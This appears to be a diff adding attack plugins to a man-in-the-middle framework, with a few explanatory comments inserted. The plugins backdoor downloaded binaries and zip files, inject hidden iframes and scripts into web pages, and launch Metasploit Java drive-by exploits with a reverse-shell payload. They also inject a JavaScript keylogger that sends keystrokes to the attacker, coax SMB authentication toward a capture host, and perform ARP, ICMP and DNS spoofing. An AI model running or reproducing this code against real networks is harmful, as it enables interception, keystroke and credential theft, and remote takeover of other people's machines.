logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))
zippyfile.extractall(tmpDir)
patchCount = 0
for info in zippyfile.infolist():
logging.info(">>> Next file in zipfile: %s" % info.filename)
if os.path.isdir(tmpDir + '/' + info.filename) is True:
logging.info('%s is a directory' % info.filename)
continue
#Check against keywords
keywordCheck = False
if type(self.zipblacklist) is str:
if self.zipblacklist.lower() in info.filename.lower():
keywordCheck = True
else:
for keyword in self.zipblacklist:
if keyword.lower() in info.filename.lower():
keywordCheck = True
continue
if keywordCheck is True:
logging.info('Zip blacklist enforced on %s' % info.filename)
continue
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(info.filename)
shutil.copyfile(file2, tmpDir + '/' + info.filename)
logging.info("%s in zip patched, adding to zipfile" % info.filename)
else:
logging.info("%s patching failed. Keeping original file in zip." % info.filename)
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
logging.info("Met Zip config patchCount limit.")
break
zippyfile.close()
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
logging.debug("Writing to zipfile: %s" % tmpFile)
for base, dirs, files in os.walk(tmpDir):
for afile in files:
filename = os.path.join(base, afile)
logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', ''))
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
zipResult.close()
#clean up
shutil.rmtree(tmpDir)
with open(tmpFile, 'rb') as f:
aZipFile = f.read()
os.remove(tmpFile)
return aZipFile
def handleResponse(self,request,data):
content_header = request.client.headers['Content-Type']
if content_header in self.zipMimeTypes:
logging.info("%s Detected supported zip file type!" % request.client.getClientIP())
bd_zip = self.zipGrinder(data)
if bd_zip:
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
return {'request':request,'data':bd_zip}
elif content_header in self.binaryMimeTypes:
logging.info("%s Detected supported binary type!" % request.client.getClientIP())
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)
patchb = self.binaryGrinder(tmpFile)
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
return {'request':request,'data':bd_binary}
else:
logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header))
return {'request':request,'data':data}
def add_options(self, options):
options.add_argument("--filepwncfg", type=file, help="Specify a config file")

117
plugins/Inject.py Normal file
View file

@ -0,0 +1,117 @@
import os,subprocess,logging,time,re
import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
class Inject(CacheKill,Plugin):
name = "Inject"
optname = "inject"
implements = ["handleResponse","handleHeader","connectionMade"]
has_opts = True
desc = "Inject arbitrary content into HTML content"
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.html_src = options.html_url
self.js_src = options.js_url
self.rate_limit = options.rate_limit
self.count_limit = options.count_limit
self.per_domain = options.per_domain
self.match_str = options.match_str
self.html_payload = options.html_payload
if self.options.preserve_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
if options.html_file != None:
self.html_payload += options.html_file.read()
self.ctable = {}
self.dtable = {}
self.count = 0
self.mime = "text/html"
print "[*] Inject plugin online"
def handleResponse(self,request,data):
#We throttle to only inject once every two seconds per client
#If you have MSF on another host, you may need to check prior to injection
#print "http://" + request.client.getRequestHostname() + request.uri
ip,hn,mime = self._get_req_info(request)
if self._should_inject(ip,hn,mime) and \
(not self.js_src==self.html_src==None or not self.html_payload==""):
data = self._insert_html(data,post=[(self.match_str,self._get_payload())])
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count+=1
logging.info("%s [%s] Injected malicious html" % (request.client.getClientIP(), request.headers['host']))
return {'request':request,'data':data}
else:
return
def _get_payload(self):
return self._get_js()+self._get_iframe()+self.html_payload
def add_options(self,options):
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
options.add_argument("--html-url",type=str,help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
options.add_argument("--html-payload",type=str,default="",help="String you would like to inject.")
options.add_argument("--html-file",type=argparse.FileType('r'),default=None,help="File containing code you would like to inject.")
options.add_argument("--match-str",type=str,default="</body>",help="String you would like to match and place your payload before. (</body> by default)")
options.add_argument("--per-domain",action="store_true",help="Inject once per domain per client.")
options.add_argument("--rate-limit",type=float,help="Inject once every RATE_LIMIT seconds per client.")
options.add_argument("--count-limit",type=int,help="Inject only COUNT_LIMIT times per client.")
options.add_argument("--preserve-cache",action="store_true",help="Don't kill the server/client caching.")
def _should_inject(self,ip,hn,mime):
if self.count_limit==self.rate_limit==None and not self.per_domain:
return True
if self.count_limit != None and self.count > self.count_limit:
#print "1"
return False
if self.rate_limit != None:
if ip in self.ctable and time.time()-self.ctable[ip]<self.rate_limit:
return False
if self.per_domain:
return not ip+hn in self.dtable
#print mime
return mime.find(self.mime)!=-1
def _get_req_info(self,request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip,hn,mime)
def _get_iframe(self):
if self.html_src != None:
return '<iframe src="%s" height=0%% width=0%%></iframe>'%(self.html_src)
return ''
def _get_js(self):
if self.js_src != None:
return '<script type="text/javascript" src="%s"></script>'%(self.js_src)
return ''
def _insert_html(self,data,pre=[],post=[],re_flags=re.I):
'''
To use this function, simply pass a list of tuples of the form:
(string/regex_to_match,html_to_inject)
NOTE: Matching will be case insensitive unless different flags are given
The pre array will have the match in front of your injected code, the post
will put the match behind it.
'''
pre_regexes = [re.compile(r"(?P<match>"+i[0]+")",re_flags) for i in pre]
post_regexes = [re.compile(r"(?P<match>"+i[0]+")",re_flags) for i in post]
for i,r in enumerate(pre_regexes):
data=re.sub(r,"\g<match>"+pre[i][1],data)
for i,r in enumerate(post_regexes):
data=re.sub(r,post[i][1]+"\g<match>",data)
return data
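A short behavioural sketch, not part of the plugin, of what _insert_html does with the pre/post tuples; the payload string is made up for the example:
# post=[...] keeps the match behind the injected code, so the payload lands just before </body>:
#   _insert_html("<html><body>hi</body></html>", post=[("</body>", "<script>alert(1)</script>")])
#   -> "<html><body>hi<script>alert(1)</script></body></html>"
# pre=[...] keeps the match in front of the injected code instead:
#   _insert_html("<html><body>hi</body></html>", pre=[("<body>", "<script>alert(1)</script>")])
#   -> "<html><body><script>alert(1)</script>hi</body></html>"
# handleResponse above uses the post form with --match-str (</body> by default) and the combined payload.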

195
plugins/JavaPwn.py Normal file
View file

@ -0,0 +1,195 @@
from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler
from time import sleep
import libs.msfrpc as msfrpc
import string
import random
import threading
import logging
import sys, os
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
class JavaPwn(BrowserProfiler, Plugin):
name = "JavaPwn"
optname = "javapwn"
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
has_opts = True
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.msfip = options.msfip
self.msfport = options.msfport
self.rpcip = options.rpcip
self.rpcpass = options.rpcpass
self.javapwncfg = options.javapwncfg
if not self.msfip:
sys.exit('[-] JavaPwn plugin requires --msfip')
if not self.javapwncfg:
self.javapwncfg = './config_files/javapwn.cfg'
self.javacfg = ConfigObj(self.javapwncfg)
self.javaVersionDic = {}
for key, value in self.javacfg.iteritems():
self.javaVersionDic[float(key)] = value
self.sploited_ips = [] # store ip of pwned or not vulnerable clients so we don't re-exploit
try:
msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version']
print "[*] Succesfully connected to Metasploit v%s" % version
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
#Initialize the BrowserProfiler plugin
BrowserProfiler.initialize(self, options)
print "[*] JavaPwn plugin online"
t = threading.Thread(name='pwn', target=self.pwn, args=(msf,))
t.setDaemon(True)
t.start() #start the main thread
def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))
def version2float(self, version): #converts the client's java version string to a float so we can compare the value to self.javaVersionDic
v = version.split(".")
return float(v[0] + "." + "".join(v[-(len(v)-1):]))
def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions
#inject iframe
logging.info("%s >> now injecting iframe to trigger exploit" % client_ip)
self.html_payload = "<iframe src='http://%s:%s%s' height=0%% width=0%%></iframe>" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects
logging.info('%s >> waiting for ze shells, Please wait...' % client_ip)
exit = False
i = 1
while i <= 30: #wait max 60 seconds for a new shell
if exit == True:
break
shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions
if len(shell) > 0:
for k,v in shell.items():
if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted
logging.info("%s >> Got shell!" % client_ip)
self.sploited_ips.append(client_ip) #target successfully exploited
exit = True
break
sleep(2)
i+=1
if exit == False: #We didn't get a shell
logging.info("%s >> session not established after 30 seconds" % client_ip)
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
def pwn(self, msfinstance):
while True:
if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled
brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format
if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited
vic_ip = brwprofile['ip']
client_version = self.version2float(brwprofile['java_version']) #convert the clients java string version to a float
logging.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
logging.info("%s >> Choosing exploit based on version string" % vic_ip)
min_version = min(self.javaVersionDic, key=lambda x: abs(x-client_version)) #retrieves the exploit with the minimum distance from the client's version
if client_version < min_version: #since the two version strings are now floats we can use the < operand
exploit = self.javaVersionDic[min_version] #get the exploit string for that version
logging.info("%s >> client is vulnerable to %s!" % (vic_ip, exploit))
msf = msfinstance
#here we check to see if we already set up the exploit to avoid creating new jobs for no reason
jobs = msf.call('job.list') #get running jobs
if len(jobs) > 0:
for k,v in jobs.items():
info = msf.call('job.info', [k])
if exploit in info['name']:
logging.info('%s >> %s exploit already started' % (vic_ip, exploit))
url = info['uripath'] #get the url assigned to the exploit
self.injectWait(msf, url, vic_ip)
else: #here we setup the exploit
rand_url = self.rand_url() # generate a random url
rand_port = random.randint(1000, 65535) # generate a random port for the payload listener
#generate the command string to send to the virtual console
#new line character very important as it simulates a user pressing enter
cmd = "use exploit/multi/browser/%s\n" % exploit
cmd += "set SRVPORT %s\n" % self.msfport
cmd += "set URIPATH %s\n" % rand_url
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter (plus its multi-platform! Yay java!)
cmd += "set LHOST %s\n" % self.msfip
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"
logging.debug("command string:\n%s" % cmd)
try:
logging.info("%s >> sending commands to metasploit" % vic_ip)
#Create a virtual console
console_id = msf.call('console.create')['id']
#write the cmd to the newly created console
msf.call('console.write', [console_id, cmd])
logging.info("%s >> commands sent succesfully" % vic_ip)
except Exception, e:
logging.info('%s >> Error occurred while interacting with metasploit: %s:%s' % (vic_ip, Exception, e))
self.injectWait(msf, rand_url, vic_ip)
else:
logging.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
self.sploited_ips.append(vic_ip)
sleep(0.5)
else:
sleep(0.5)
else:
sleep(0.5)
def add_options(self, options):
options.add_argument('--msfip', dest='msfip', help='IP Address of MSF')
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
options.add_argument('--javapwncfg', type=file, help='Specify a config file')
def finish(self):
'''This will be called when shutting down'''
msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', self.rpcpass)
jobs = msf.call('job.list')
if len(jobs) > 0:
print '[*] Stopping all running metasploit jobs'
for k,v in jobs.items():
msf.call('job.stop', [k])
consoles = msf.call('console.list')['consoles']
if len(consoles) > 0:
print "[*] Closing all virtual consoles"
for console in consoles:
msf.call('console.destroy', [console['id']])

108
plugins/JsKeylogger.py Normal file
View file

@ -0,0 +1,108 @@
from plugins.plugin import Plugin
from plugins.Inject import Inject
import logging
class jskeylogger(Inject, Plugin):
name = "Javascript Keylogger"
optname = "jskeylogger"
desc = "Injects a javascript keylogger into clients webpages"
implements = ["handleResponse","handleHeader","connectionMade", "sendPostData"]
has_opts = False
def initialize(self,options):
Inject.initialize(self, options)
self.html_payload = self.msf_keylogger()
print "[*] Javascript Keylogger plugin online"
def sendPostData(self, request):
#Handle the plugin output
if 'keylog' in request.uri:
keys = request.postData.split(",")
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice[:-1] # backspace: drop only the last captured character
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
logging.warning("%s ERROR decoding char %s" % (request.client.getClientIP(), n))
logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
def msf_keylogger(self):
#Stolen from the Metasploit module http_javascript_keylogger
payload = """<script type="text/javascript">
window.onload = function mainfunc(){
var2 = ",";
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener) {
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
} else {
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e){
var3 = (window.event) ? window.event.keyCode : e.which;
var3 = var3.toString(16);
if (var3 != "d"){
function3(var3);
}
}
function function1(e){
var3 = (window.event) ? window.event.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13){
function3(var3);
}
}
function function3(var3){
var2 = var2 + var3 + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(var2);
if (var3 == 13 || var2.length > 3000)
var2 = ",";
}
</script>"""
return payload
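A worked example, not in the original file, of how sendPostData above decodes a captured POST body; the keystrokes are invented:
# The injected script POSTs comma-separated values to the 'keylog' URI: printable keys as hex
# char codes (keypress), TAB/backspace/Enter as the decimal codes 9/8/13 (keydown).
#   request.postData = ",68,65,79,"             # victim typed 'h', 'e', 'y'
#   split(",") -> ['', '68', '65', '79', '']    # the empty ends are deleted
#   '68'.decode('hex') -> 'h', '65' -> 'e', '79' -> 'y'
#   logged line: "<ip> [<host>] Keys: hey"      # a trailing '13' (Enter) would reset the buffer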

79
plugins/Replace.py Normal file
View file

@ -0,0 +1,79 @@
import os,subprocess,logging,time,re,sys
import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
class Replace(CacheKill,Plugin):
name = "Replace"
optname = "replace"
implements = ["handleResponse","handleHeader","connectionMade"]
has_opts = True
desc = "Replace arbitrary content in HTML content"
def initialize(self,options):
self.options = options
self.search_str = options.search_str
self.replace_str = options.replace_str
self.regex_file = options.regex_file
if (self.search_str==None or self.search_str=="") and self.regex_file is None:
sys.exit("[*] Please provide a search string or a regex file")
self.regexes = []
if self.regex_file is not None:
print "[*] Loading regexes from file"
for line in self.regex_file:
self.regexes.append(line.strip().split("\t"))
if self.options.keep_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
self.ctable = {}
self.dtable = {}
self.mime = "text/html"
print "[*] Replace plugin online"
def handleResponse(self,request,data):
ip,hn,mime = self._get_req_info(request)
if self._should_replace(ip,hn,mime):
if self.search_str!=None and self.search_str!="":
data = data.replace(self.search_str, self.replace_str)
logging.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
# Did the user provide us with a regex file?
for regex in self.regexes:
try:
data = re.sub(regex[0], regex[1], data)
logging.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
except Exception, e:
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
return {'request':request,'data':data}
return
def add_options(self,options):
options.add_argument("--search-str",type=str,default=None,help="String you would like to replace --replace-str with. Default: '' (empty string)")
options.add_argument("--replace-str",type=str,default="",help="String you would like to replace.")
options.add_argument("--regex-file",type=file,help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
options.add_argument("--keep-cache",action="store_true",help="Don't kill the server/client caching.")
def _should_replace(self,ip,hn,mime):
return mime.find(self.mime)!=-1
def _get_req_info(self,request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip,hn,mime)

22
plugins/SMBAuth.py Normal file
View file

@ -0,0 +1,22 @@
from plugins.plugin import Plugin
from plugins.Inject import Inject
class SMBAuth(Inject,Plugin):
name = "SMBAuth"
optname = "smbauth"
desc = "Evoke SMB challenge-response auth attempts"
def initialize(self,options):
Inject.initialize(self,options)
self.target_ip = options.host
self.html_payload = self._get_data()
print "[*] SMBAuth plugin online"
def add_options(self,options):
options.add_argument("--host", type=str, help="The ip address of your capture server")
def _get_data(self):
return '<img src=\"\\\\%s\\image.jpg\">'\
'<img src=\"file://///%s\\image.jpg\">'\
'<img src=\"moz-icon:file:///%%5c/%s\\image.jpg\">'\
% tuple([self.target_ip]*3)
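For reference, a sketch (not in the original file) of what the injected payload expands to; the capture-server IP is an assumption:
# With --host 192.168.1.100 the three escaped format strings above render as:
#   <img src="\\192.168.1.100\image.jpg">
#   <img src="file://///192.168.1.100\image.jpg">
#   <img src="moz-icon:file:///%5c/192.168.1.100\image.jpg">
# Each UNC/file-style reference nudges the browser into an SMB connection so the
# challenge-response attempt can be captured by the host given with --host.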

218
plugins/Spoof.py Normal file
View file

@ -0,0 +1,218 @@
#
# DNS Spoofing code has been stolen from https://github.com/DanMcInerney/dnsspoof/
#
from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from plugins.plugin import Plugin
from time import sleep
import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
import os
import sys
import threading
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
class Spoof(Plugin):
name = "Spoof"
optname = "spoof"
desc = 'Redirect traffic using ICMP, ARP or DNS'
has_opts = True
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.interface = options.interface
self.arp = options.arp
self.icmp = options.icmp
self.dns = options.dns
#self.dhcp = options.dhcp
self.domain = options.domain
self.dnsip = options.dnsip
self.dnscfg = options.dnscfg
self.gateway = options.gateway
self.summary = options.summary
self.target = options.target
self.arpmode = options.arpmode
self.port = self.options.listen
self.debug = False
self.send = True
if os.geteuid() != 0:
sys.exit("[-] Spoof plugin requires root privileges")
if self.options.log_level == 'debug':
self.debug = True
print "[*] Spoof plugin online"
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if self.arp == True:
if self.icmp == True:
sys.exit("[-] --arp and --icmp are mutually exclusive")
if (not self.interface or not self.gateway):
sys.exit("[-] ARP Spoofing requires --gateway and --iface")
self.mac = get_if_hwaddr(self.interface)
self.routermac = getmacbyip(self.gateway)
print "[*] ARP Spoofing enabled"
if self.arpmode == 'req':
pkt = self.build_arp_req()
elif self.arpmode == 'rep':
pkt = self.build_arp_rep()
elif self.icmp == True:
if self.arp == True:
sys.exit("[-] --icmp and --arp are mutually exclusive")
if (not self.interface or not self.gateway or not self.target):
sys.exit("[-] ICMP Redirection requires --gateway, --iface and --target")
self.mac = get_if_hwaddr(self.interface)
self.routermac = getmacbyip(self.gateway)
print "[*] ICMP Redirection enabled"
pkt = self.build_icmp()
if self.summary == True:
pkt.show()
ans = raw_input('\n[*] Continue? [Y|n]: ').lower()
if ans == 'y' or len(ans) == 0:
pass
else:
sys.exit(0)
if self.dns == True:
if not self.dnscfg:
if (not self.dnsip or not self.domain):
sys.exit("[-] DNS Spoofing requires --domain, --dnsip")
elif self.dnscfg:
self.dnscfg = ConfigObj(self.dnscfg)
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
print "[*] DNS Spoofing enabled"
self.start_dns_queue()
print '[*] Setting up ip_forward and iptables'
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
file.write('1')
file.close()
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)
t = threading.Thread(name='send_packets', target=self.send_packets, args=(pkt,self.interface,self.debug,))
t.setDaemon(True)
t.start()
def send_packets(self,pkt,interface, debug):
while self.send == True:
sendp(pkt, inter=2, iface=interface, verbose=debug)
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=get_if_addr(self.interface))/\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def build_arp_req(self):
if self.target == None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, pdst=self.gateway)
elif self.target:
target_mac = getmacbyip(self.target)
if target_mac == None:
sys.exit("[-] Error: Could not resolve targets MAC address")
pkt = Ether(src=self.mac, dst=target_mac)/ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=target_mac, pdst=self.target)
return pkt
def build_arp_rep(self):
if self.target == None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2)
elif self.target:
target_mac = getmacbyip(self.target)
if target_mac == None:
sys.exit("[-] Error: Could not resolve targets MAC address")
pkt = Ether(src=self.mac, dst=target_mac)/ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=target_mac, pdst=self.target, op=2)
return pkt
def nfqueue_callback(self, i, payload):
data = payload.get_data()
pkt = IP(data)
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
if self.dnscfg:
for k,v in self.dnscfg.items():
if k in pkt[DNS].qd.qname:
self.modify_dns(payload, pkt, v)
elif self.domain in pkt[DNS].qd.qname:
self.modify_dns(payload, pkt, self.dnsip)
def modify_dns(self, payload, pkt, ip):
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
logging.info("%s Spoofed DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
def start_dns_queue(self):
self.q = nfqueue.queue()
self.q.set_callback(self.nfqueue_callback)
self.q.fast_open(0, socket.AF_INET)
self.q.set_queue_maxlen(5000)
reactor.addReader(self)
self.q.set_mode(nfqueue.NFQNL_COPY_PACKET)
def fileno(self):
return self.q.get_fd()
def doRead(self):
self.q.process_pending(100)
def connectionLost(self, reason):
reactor.removeReader(self)
def logPrefix(self):
return 'queue'
def add_options(self,options):
options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
# options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers')
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
options.add_argument('--domain', type=str, dest='domain', help='Domain to spoof [e.g google.com]')
options.add_argument('--dnsip', type=str, dest='dnsip', help='IP address to resolve dns queries to')
options.add_argument("--dnscfg", type=file, help="Specify a config file")
def finish(self):
self.send = False
sleep(3)
print '\n[*] Resetting ip_forward and iptables'
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
file.write('0')
file.close()
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if self.dns == True:
self.q.unbind(socket.AF_INET)
self.q.close()
if self.arp == True:
print '[*] Re-arping network'
pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
sendp(pkt, inter=1, count=5, iface=self.interface)

View file

@ -0,0 +1,47 @@
import logging
from cStringIO import StringIO
from plugins.plugin import Plugin
class Upsidedownternet(Plugin):
name = "Upsidedownternet"
optname = "upsidedownternet"
desc = 'Flips images 180 degrees'
has_opts = False
implements = ["handleResponse","handleHeader"]
def initialize(self,options):
from PIL import Image,ImageFile
globals()['Image'] = Image
globals()['ImageFile'] = ImageFile
self.options = options
def handleHeader(self,request,key,value):
'''Kill the image skipping that's in place for speed reasons'''
if request.isImageRequest:
request.isImageRequest = False
request.isImage = True
request.imageType = value.split("/")[1].upper()
def handleResponse(self,request,data):
try:
isImage = getattr(request,'isImage')
except AttributeError:
isImage = False
if isImage:
try:
image_type=request.imageType
#For some reason more images get parsed using the parser
#rather than a file...PIL still needs some work I guess
p = ImageFile.Parser()
p.feed(data)
im = p.close()
im=im.transpose(Image.ROTATE_180)
output = StringIO()
im.save(output,format=image_type)
data=output.getvalue()
output.close()
logging.info("Flipped image")
except Exception as e:
print "Error: %s" % e
return {'request':request,'data':data}

View file

@ -1,3 +1,6 @@
#Hack grabbed from http://stackoverflow.com/questions/1057431/loading-all-modules-in-a-folder-in-python
#Has to be a cleaner way to do this, but it works for now
import os
import glob
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]

Some files were not shown because too many files have changed in this diff.